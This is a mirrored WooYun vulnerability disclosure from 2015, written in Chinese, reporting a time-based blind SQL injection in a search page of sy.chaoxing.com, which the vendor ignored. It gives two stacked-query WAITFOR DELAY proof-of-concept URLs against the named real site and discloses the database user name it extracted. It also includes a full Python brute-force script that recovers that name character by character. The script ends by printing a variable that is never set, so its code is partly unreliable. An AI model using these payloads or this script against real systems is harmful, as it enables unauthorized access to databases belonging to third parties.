乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-12: 厂商已经主动忽略漏洞,细节向公众公开
RT
网站sy.chaoxing.com
poc 1http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if len(user)=8 WAITFOR DELAY '0:0:5' ;--poc 2http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if user like '________' WAITFOR DELAY '0:0:5' ;--数据库用户user='kyD_user'
也写个脚本
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport hashlibimport requestspayloads = list(string.ascii_lowercase)for i in range(0,10): payloads.append(str(i))payloads.extend(string.ascii_uppercase)payloads += ['@', '.','_']print '[%s] Start to retrive mssql User' % time.strftime('%H:%M:%S', time.localtime())user = ''length=8result=""for i in range(1,30): found=False while found==False: misscountperloop=0 for payload in payloads: timeout_count = 0 for j in range(1,3): # 2 times to confirm try: likeholder="" if result: likeholder+=result likeholder+=payload for j in range(7-len(result)): likeholder+="_" url="http://sy.chaoxing.com/nfavs/searchByKey.jspx?linkName=&cataid=01&cataName经典理论&dt=95 ;if user like '"+likeholder+"' WAITFOR DELAY '0:0:5' ;--" requests.get(url,timeout=4) print '.', misscountperloop+=1 break except Exception, e: #print e timeout_count += 1 time.sleep(5) # wait DB server recover from last query if timeout_count == 2: result += payload print '\n[In progress] now user is %s' % result break if misscountperloop==len(payloads): print result sys.exit(1)print '\nFinally, mssql user is', user
危害等级:无影响厂商忽略
忽略时间:2015-12-12 10:42
漏洞Rank:4 (WooYun评价)
暂无